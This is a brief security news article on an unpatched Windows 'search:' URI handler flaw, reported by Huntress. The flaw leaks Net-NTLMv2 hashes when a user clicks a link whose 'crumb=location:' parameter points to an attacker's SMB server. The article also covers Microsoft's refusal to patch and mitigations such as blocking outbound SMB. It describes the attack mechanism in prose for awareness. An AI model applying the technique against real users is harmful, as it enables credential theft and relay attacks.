Vulnerability Overview
Cybersecurity researchers have uncovered a new unpatched issue in Microsoft Windows that could allow attackers to steal NTLMv2 hashes from unsuspecting users. The flaw resides in the Windows Search URI handler, specifically within the ‘search:’ protocol. Security firm Huntress reported that this vulnerability can be exploited to leak a user’s Net-NTLMv2 hash when they click a specially crafted link in a web browser, email, or other URL source.
The technique is similar to a previously patched vulnerability in the Windows Snipping Tool’s URI handler, which also leaked NTLM hashes via SMB connections. In this case, the attack uses the ‘search:’ protocol with a ‘crumb=location:’ parameter that points to an attacker-controlled SMB server. When the user clicks the link, the system attempts to connect to the malicious server, triggering NTLM authentication and exposing the hash.
Impact and Scope
Huntress researcher Andrew Schwartz noted that this vulnerability uses the same NTLM leakage mechanism as the prior flaw and carries the same Moderate severity rating. An attacker who successfully obtains the NTLMv2 hash could use it in relay attacks to gain unauthorized access to network resources or authenticate as the victim on other systems.
Microsoft was notified of the issue on April 15, 2026, but declined to issue a patch, stating that only vulnerabilities rated Important or Critical meet their servicing threshold. This leaves Windows users exposed, as the attack requires minimal user interaction and can be launched from a simple web page or email link. Organizations should consider additional security measures such as blocking outbound SMB traffic and educating users about suspicious links.
Source: The Hacker News
